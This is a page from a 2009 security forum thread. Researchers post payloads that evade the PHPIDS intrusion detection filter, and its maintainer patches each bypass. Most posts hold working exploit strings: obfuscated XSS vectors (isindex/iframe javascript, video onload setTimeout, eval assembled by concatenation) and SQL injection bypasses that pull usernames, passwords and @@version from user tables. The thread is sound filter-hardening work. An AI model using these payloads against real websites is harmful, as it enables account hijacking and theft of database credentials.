Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...2021222324252627282930...LastNext
Current Page: 25 of 31
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 09, 2009 11:38AM

Really nice fix btw! I almost doubted that you'd be able to fix that last one.
anyways here is a new one :D

slackers didn't accept the chars:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=dGhpcyAuZmRnc2RmZ3NkZmdkc2ZnZHNmZwp0aGlzIC5mZGdzZGZnc2RmZ2RzZmdkc2ZnCnRoaXMgLmZkZ3NkZmdzZGZnZHNmZ2RzZmcKdGhpcyAuZmRnc2RmZ3NkZmdkc2ZnZHNmZwp0aGlzIC5mZGdzZGZnc2RmZ2RzZmdkc2ZnCmFhYWFhYWFhYWFhYWFhYWE6KGFsZXJ0fHw8QGZyb21jaGFyY29kZXNfMj4xMDAwLDEwMDEsMTAwMiwxMDAzLDEwMDQsMTAwNSwxMDA2LDEwMDcsMTAwODxAL2Zyb21jaGFyY29kZXNfMj4pKDEpfHw8QGZyb21jaGFyY29kZXNfMz4xMDAwLDEwMDEsMTAwMiwxMDAzLDEwMDQsMTAwNSwxMDA2LDEwMDcsMTAwODxAL2Zyb21jaGFyY29kZXNfMz4%3D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 02/09/2009 11:40AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: February 09, 2009 12:14PM

Bloody emoticons!

It also works without the special chars :) Nice one and - well - did I mention already that Gecko's JS parser is completely nuts? ;)

Firefox btw suggests "satisfactoriness" when trying to spell check the vector - smarter browser than I thought...

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 09, 2009 12:26PM

@mario

That vector should work in any parser ;) maybe js in general is nuts :)

May I suggest you have some form of javascript token scanning, some unicode characters can and can't be used as js variables. You could then use a unicode range regexp to find the ones that are valid and if it looks like valid javascript block it.

This Hackvertor tag scans variables in IE/Firefox (I haven't got round to look up the errror object in the others yet)
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEBqc3ZhcmlhYmxlXzAoMTAwMCwgMTEwMCkgLz4%3D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: February 09, 2009 02:08PM

Hm - the Converter should transform Unicode to ascii placeholders so those characters won't hit the rules.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 09, 2009 06:16PM

Hmmm the converter doesn't take into account illegal characters:-

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEByZXBlYXRfMig1KT48QGZyb21jaGFyY29kZXNfMT45MDAwPEAvZnJvbWNoYXJjb2Rlc18xPjxAL3JlcGVhdF8yPj1hbGVydAo8QHJlcGVhdF8zKDUpPjxAZnJvbWNoYXJjb2Rlc180PjkwMDA8QC9mcm9tY2hhcmNvZGVzXzQ%2BPEAvcmVwZWF0XzM%2BKDEp

Why raise a XSS impact if the code can't execute? I guess that's my point

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: February 09, 2009 06:24PM

Because you can never be sure if the current user agent will maybe execute it anyway due to whatever implementation flaws/server side issues/weak charsets?

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 10, 2009 03:34AM

Ok fair enough that has happened before so it makes sense

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 23, 2009 08:38AM

Totally cool real XSS injection:-

<isindex/type=image
xyz=&lt;iframe/src=javascript&amp;#x3a&amp;#x61lert&amp;#x28&amp;#x31&amp;#x29&gt;
onerror=undefined,/\//,outerHTML=xyz src=1>

Do I get a cookie? :D

Oh btw IE only

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 02/23/2009 08:39AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: February 23, 2009 08:46AM

2 cookies from me. Nice!

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 23, 2009 09:31AM

Thanks for the cookies but even before I've finished them it was fixed :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Matt Presson
Date: February 23, 2009 09:40AM

That is just crazy. One of the best, but still crazy.

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: DoctorDan
Date: February 28, 2009 01:29PM

lolwut.
Gareth, haha very nice. Cookie++

-Dan

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: March 01, 2009 12:05AM

http://p42.us/phpids/87.html
(this)[new Array+('eva')+new Array+ 'l'](/can.you/+name+/sla.ckers.forum.script/)

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 01, 2009 06:20AM

Nice :) Just fixed it in the trunk - but couldn't update the demo yet. Will do tomorrow. Thx!

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 02, 2009 05:14PM

IE only. Tag injection again :D

http://tinyurl.com/am5vo6

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 03, 2009 04:29AM

Nice one! I added some code to deal with double encoding - even if if doesn't apply in this case. Also the undefined cannot be used as obfuscation method anymore (Although I am pretty sure it's possible to trick the new filters)

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 03, 2009 04:57AM

Oh yeah it doesn't apply hehe, I must have thought one of the other errors triggered it. It's still vulnerable though, the harmless html option seems weak. I don't have time to test right now but I may do some tonight

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Reiners
Date: March 04, 2009 10:06AM

quite a while back that I've tested for some SQLi

new one:
2' between 1 and 3 or 0x61 like 'a (php-ids)
4' MOD 2 like '0 (php-ids)
2' / 0x62 or 0 like '0 (php-ids)



Edited 2 time(s). Last edit at 03/04/2009 10:28AM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 04, 2009 11:46PM

Decided to give it a try, here's what I came up with:

http://demo.phpids.org/?test=a%27%20and%20username%20=%27lightos a' and username ='lightos
http://demo.phpids.org/?test=a%27%20having%201%3C1%20and%201%20like%20%27a a' having 1<1 and 1 like 'a
http://demo.phpids.org/?test=a%27%20having%201%20%20=1/%201%20and%201%20=%271 a' having 1 =1/ 1 and 1 ='1
http://demo.phpids.org/?test=1%20order%20by%201 1 order by 1
http://demo.phpids.org/?test=1%20order%20by%20ifnull(null,userid%29 1 order by ifnull(null,userid)
http://demo.phpids.org/?test=1%20order%20by%20if((0)=4%20,2,0%29 1 order by if((0)=4 ,2,0)
http://demo.phpids.org/?test=1%20order%20by%20if(1%3C2%20,uname,uid%29 1 order by if(1<2 ,uname,uid)
http://demo.phpids.org/?test=1%20having%201%20%20=1 1 having 1 =1
http://demo.phpids.org/?test=0x31%20having%201%3C1 0x31 having 1<1
http://demo.phpids.org/?test=0x31%20union%20select%20@@version,username,password%20from%20users 0x31 union select @@version,username,password from users
http://demo.phpids.org/?test=1%20and%201%20like%200%20union%20select%20@@version,username,password%20from%20users 1 and 1 like 0 union select @@version,username,password from users
http://demo.phpids.org/?test=1%20PROCEDURE%20ANALYSE(%29 1 PROCEDURE ANALYSE() ??

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 08, 2009 02:46PM

HTML5 :D Firefox beta XSS:-

<video/title=.10000/aler&#x74;(1) onload=.1/setTimeout(title)>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 08, 2009 03:11PM

Hi!

Excuse the late answer - had too much work to do the recent days. Nice finds - some of them are pretty tricky - especially @@version ones from lightos - due to the fact that they circumvented the whole rule check. Nice work and thx!

I could fix most of them - most recent code in the trunk as usual...

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 08, 2009 03:18PM

@Gareth: I can't get it running w/o an impact. But nice anyway - I like the title stuff :)

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Reiners
Date: March 08, 2009 06:14PM

I thought PHP-IDS doesnt take user input without special characters into account, thats why I always use SQL injections with breaking out of quotes.
if not, then there will be _tons_ of vectors, starting with basics like

1 or 1 like 1
1 union select user,pass from users

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Reiners
Date: March 08, 2009 06:27PM

new bypasses:
0' between 2-1 and 4-1 or 1 like -'1
0' between 2-1 and 4-1 or 1 sounds like binary '1
0' between 2 mod 1 and 4-1 or 1 like -'1

5'-1 mod 3-1 like binary '0
2' mod 0x62 or 0 like 0 div '1

2' / 0x62 or 0 like binary '0



Edited 1 time(s). Last edit at 03/08/2009 06:30PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 09, 2009 12:49AM

A couple more for the collection,

http://demo.php-ids.org/?test=-1%27%20/ID%20having%201%3C%201%20and%201%20like%201/%271 -1' /ID having 1< 1 and 1 like 1/'1
http://demo.php-ids.org/?test=-1%27%20/ID%20or%205%20=%20version()/1%20or%200x31%20=%20%272 -1' /ID or 5 = version()/1 or 0x31 = '2
http://demo.php-ids.org/?test=-1%27%20/ID%20or%205%20=%20version()/1%20and%20ID%20=%20%271 -1' /ID or 5 = version()/1 and ID = '1
http://demo.php-ids.org/?test=-1%27%20/ID%20or%20(0x6C696768746F73406C6F63616C686F7374)%20like%20user()%20or%201%20=%20%272 -1' /ID or (0x6C696768746F73406C6F63616C686F7374) like user() or 1 = '2
http://demo.php-ids.org/?test=-1%27%20/ID;%20select%201,password/0%20from%20Users%20where%20ID%20like%201/%271 -1' /ID; select 1,password/0 from Users where ID like 1/'1

This gets displayed as normal, http://demo.php-ids.org/?test=-1%27%20/ID%20or%204%20=%20version()/1%20or%201%20=%20%222 but when we change the double quotation mark to a single,
http://demo.php-ids.org/?test=-1%27%20/ID%20or%204%20=%20version()/1%20or%201%20=%20%272 the html gets displayed a little weird. Any ideas why?

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 09, 2009 06:00AM

@mario

It defo worked, I guess I must have caught something while you were updating. Well never mind I won't moan.....

http://tinyurl.com/7c7h8v

Hahahaha :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/09/2009 06:01AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: March 11, 2009 11:46PM

injection:
this[('eva')+new Array + 'l'](/x.x.x/+name+/x.x/)
demo: http://p42.us/phpids/88.html

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thrill
Date: March 12, 2009 12:21AM

You know.. I'll never get tired of saying this, but you guys are just sick.. both in a good way and in a not so good way! :)

To me this reads like the early days of shellcode... on STEROIDS!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 12, 2009 10:58AM

Death by marquee

http://www.businessinfo.co.uk/labs/phpids/phpids7.html

Works on IE & FF

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/12/2009 11:01AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 12, 2009 07:21PM

@Gareth: This is so five minutes ago (but still nice!) :)

@thornmaker, @sql-guys: Will tidy up the rules this weekend - not enough time right now. Comments will follow -thx!!!

Options: ReplyQuote
Pages: PreviousFirst...2021222324252627282930...LastNext
Current Page: 25 of 31


Sorry, only registered users may post in this forum.